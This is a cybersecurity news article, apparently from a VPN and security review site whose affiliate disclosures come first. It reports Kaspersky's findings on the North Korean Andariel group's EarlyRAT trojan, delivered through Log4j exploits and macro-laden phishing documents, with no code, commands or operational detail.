Disclosures:
Professional Reviews

The reviews found on GuideHaven consist of evaluations conducted by community reviewers. These assessments take into account the reviewers’ unbiased and knowledgeable analysis of the products and services being reviewed.

Ownership

GuideHaven is a leading cybersecurity review website with a team of experts experienced in testing and evaluating VPNs, antiviruses, password managers, parental controls, and software tools. Our reviews are available in 29 languages, making them accessible to a broad audience since 2018. To further support our readers in their pursuit of online security, we’ve partnered with Kape Technologies PLC, which owns popular products like ExpressVPN, CyberGhost, ZenMate, Private Internet Access, and Intego, all of which may be reviewed on our website.

Affiliate Commissions

GuideHaven contains reviews that follow the strict reviewing standards, including ethical standards, that we have adopted. Such standards require that each review will take into consideration the independent, honest, and professional examination of the reviewer. That being said, we may earn a commission when a user completes an action using our links, at no additional cost to them. On listicle pages, we rank vendors based on a system that prioritizes the reviewer’s examination of each service, but also considers feedback received from our readers and our commercial agreements with providers.

Review Guidelines

The reviews published on GuideHaven are written by community reviewers that examine the products according to our strict reviewing standards. Such standards ensure that each review prioritizes the independent, professional, and honest examination of the reviewer, and takes into account the technical capabilities and qualities of the product together with its commercial value for users. The rankings we publish may also take into consideration the affiliate commissions we earn for purchases through links on our website.

News Heading

North Korean ‘Andariel’ Threat Group Adds New EarlyRAT Malware to Its Phishing Campaign

Shipra Sanganeria
Published by Shipra Sanganeria on June 30, 2024

According to a recent cybersecurity report, Andariel, a part of the state-sponsored Lazarus Threat Group with links to North Korea, has been associated with the discovery of a new malware named ‘EarlyRAT’.

In mid-2022, the threat actor Andariel was known for using the DTrack malware and Maui ransomware. To breach its target’s network, Andariel also exploited the Log4j vulnerability, while introducing several types of new malware, like YamaBot, MagicRat and updated versions of NukeSpeed and DTrack.

EarlyRAT was discovered by Kaspersky in an unrelated investigation while looking into Andariel’s campaign. It was observed that the threat group infected its target’s machine by executing a Log4j exploit, which further downloaded malwares from a C2 (command & control) server.

However, in the case of EarlyRAT, it was seen that the malware was propagated using phishing documents (Microsoft Word). These files used macros to fetch the malware from a server related to the Maui ransomware campaign.

EarlyRAT is a simple remote access trojan, which when executed collects system information and sends it to a C2 server. ‘’In terms of functionality, EarlyRat is very simple. It is capable of executing commands, and that is about the most interesting thing it can do,’’ the report stated. Similarity was also seen between EarlyRAT and MagicRAT. Both have limited functionality and are also written using framework, PureBasic for EarlyRAT and Qt for MagicRAT.

The investigation further revealed that the commands were being executed by an inexperienced human operator, based on the number of mistakes, and typing errors. Moreover, a new attack tactic used by Andariel was also identified, i.e., using a set of off-the-shelf legitimate tools like PuTTY, 3Proxy, ForkDump, NTDSDumpEx, Powerline and SupRemo, among others.

Given that Lazarus and its sub-groups not only engage in APTs but also cybercrimes, like ransomware deployment, it’s imperative to study both complex and simple malwares introduced by this group. By focusing on TTPs (tactics, techniques, and procedures), targeted organizations can pre-empt attacks and deploy ‘’proactive countermeasures to prevent incidents from happening,’’ noted Kaspersky.

Did you like this article? Rate it!
 
 
 
 
 
I hated it I don’t really like it It was ok Pretty good! Loved it!
0 Voted by 0 users
Title
Comment
Thanks for your feedback